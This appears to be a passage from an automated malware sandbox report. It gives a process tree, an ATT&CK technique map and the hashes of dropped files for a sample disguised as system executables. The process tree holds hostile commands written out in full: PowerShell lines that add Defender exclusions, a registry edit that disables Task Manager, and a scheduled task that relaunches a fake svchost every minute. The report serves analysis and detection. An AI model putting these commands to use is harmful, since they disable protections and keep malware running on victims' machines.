C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:3640

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4396

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:3544

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:4328

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:916

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4952

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:2924

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2112

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2676

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:5012

C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3236

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\SurrogatewinDrivernetsvc\FI5uMh3ETeLxf7f5t3w.vbe"
3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\SurrogatewinDrivernetsvc\gA0MRjUus87.bat" "
4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3512

C:\SurrogatewinDrivernetsvc\portproviderperf.exe
"C:\SurrogatewinDrivernetsvc\portproviderperf.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1636

C:\Users\Admin\AppData\Local\Temp\Windows Driver Foundation.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Driver Foundation.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Driver Foundation.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Driver Foundation.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2732

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1544

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\SurrogatewinDrivernetsvc\FI5uMh3ETeLxf7f5t3w.vbe
Filesize
212B

MD5
bdae1284d1499c147434adaab8e15667

SHA1
b4ac30b9c6f0542067dffccee0794d4ea546b583

SHA256
26d933d81e56ceacb4cced22c680c22f4c12d2b4ce3a489303fc2aec67632f88

SHA512
3b86e7ba47b3b6041fe7e5aa9a7ffc3a0049ade5cbd6b3b58668c70c08513382373ef5c2432628a421076aade3de953af34423a80e6041cb110b248bb6ef31e3

Download Submit
C:\SurrogatewinDrivernetsvc\gA0MRjUus87.bat
Filesize
162B

MD5
e01ef91219b266b14d1ae415d30256d5

SHA1
cad006a2efee48fcad1166e7ce3bc118ff139808

SHA256
db58b3dde8508ecbe59d938545246355b52d9cdec29f76657b66638c4d7aeeb2

SHA512
7826ca4bda02431bff87c7c72bd1ea53bc769b8574302a37445318360326e5a89e309c35dbc8f9981ec35c5067b4a459195b78d0289f5d93f6ec54be4c3f1e7b

Download Submit
C:\SurrogatewinDrivernetsvc\portproviderperf.exe
Filesize
2.7MB

MD5
51cbb36089b836f1cfe94e1ee88e344d

SHA1
66cfd5986f79d85be3d2424ac53d6e0b484f2791

SHA256
9e81ddf406a5afea06ef9d412ee55c58d39a609ea7c5464378a5b5ab96670998

SHA512
39ad09295cc6171646d508cb81503e17dac4bda780f482a09a72b3cf80b2a37ab6e097c298970d3bac41a6b20514481fac1eb53b71d27a9e89769074dfc8d52b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cae60f0ddddac635da71bba775a2c5b4

SHA1
386f1a036af61345a7d303d45f5230e2df817477

SHA256
b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

SHA512
28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e60eb305a7b2d9907488068b7065abd3

SHA1
1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

SHA256
ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

SHA512
95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Temp\EasyAntiCheat.bat
Filesize
659B

MD5
2d4e81e15ccf4579be60dc575f28ec72

SHA1
0312d732322ad6e0b3ea68462ba1ef4b24a3ddcb

SHA256
082f209b74dbcb68202df3759e716dcf7efe546dd267e472190ffcf0fbcfdaa7

SHA512
93e3861cd244f94baa80dc06448eb70e426d835dc0657ef5ce2501f85fe80b0dece67b87b2fe883cdb0640937e653c57859a9fe730d8386a6ccd2f699386e124

Download Submit
C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
Filesize
3.0MB

MD5
e752ea010d6bb2c6afebe6d1f915feda

SHA1
a5737dfc7b7d6fa6509f3a0e79544b170d9476e2

SHA256
18e279bca944d2ba87ff29c8df967e27621db9e4a6a4914fe635e5b7e4d305d4

SHA512
01a203da6717e1b164c2f7002252bb08df6dcc8ed40e5d1f97cacf1b9371568a6a2b2b1ff4635f263854cd993cbc28d1177fd558565881c065cf595c05e6e866

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Driver Foundation.exe
Filesize
69KB

MD5
99088d7d8b409b4039b02295e64a686f

SHA1
f58dad3090854f8ab5cc3de89d6cdaeb151883d4

SHA256
a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7

SHA512
a485b749f096a63bcc733b848317ceca918ee46516bcf17593c8358303a80aa0fb15c99b444fbeac02f79ac69c165e8a2fbb614265a56d99b5c098bd48d388b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oqb4jwbr.a4v.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe
Filesize
77KB

MD5
84f35bb606e5d8049b4c7d57d4a9148a

SHA1
385862c81fb695799b7cdd5199a212f8de2e1cb7

SHA256
6e3c920e6115f3b386883ef1d439eec2691923504b42d863bc43de929435f627

SHA512
dee62c8a3b5fadaec1ba91757de1bf78ce9caf4d9e9c5a4226997f15fb3e3387ce5e3bc2ff019a361b3a5b30b9e03246cfbccdf10f586f068d111988445e999d

Download Submit
memory/872-36-0x00000000000A0000-0x00000000000BA000-memory.dmp

Filesize
104KB

Download
memory/1356-0-0x00007FFC558D3000-0x00007FFC558D5000-memory.dmp

Filesize
8KB

Download
memory/1356-38-0x00007FFC558D0000-0x00007FFC56391000-memory.dmp

Filesize
10.8MB

Download
memory/1356-10-0x00007FFC558D0000-0x00007FFC56391000-memory.dmp

Filesize
10.8MB

Download
memory/1356-1-0x0000000000350000-0x00000000005EA000-memory.dmp

Filesize
2.6MB

Download
memory/2548-145-0x0000000001900000-0x000000000190E000-memory.dmp

Filesize
56KB

Download
memory/2548-144-0x0000000000E30000-0x00000000010E6000-memory.dmp

Filesize
2.7MB

Download
memory/2952-59-0x00000244A6C30000-0x00000244A6C52000-memory.dmp

Filesize
136KB

Download
memory/4116-41-0x00007FFC558D0000-0x00007FFC56391000-memory.dmp

Filesize
10.8MB

Download
memory/4116-158-0x00007FFC558D0000-0x00007FFC56391000-memory.dmp

Filesize
10.8MB

Download
memory/4116-37-0x0000000000890000-0x00000000008A8000-memory.dmp

Filesize
96KB

Download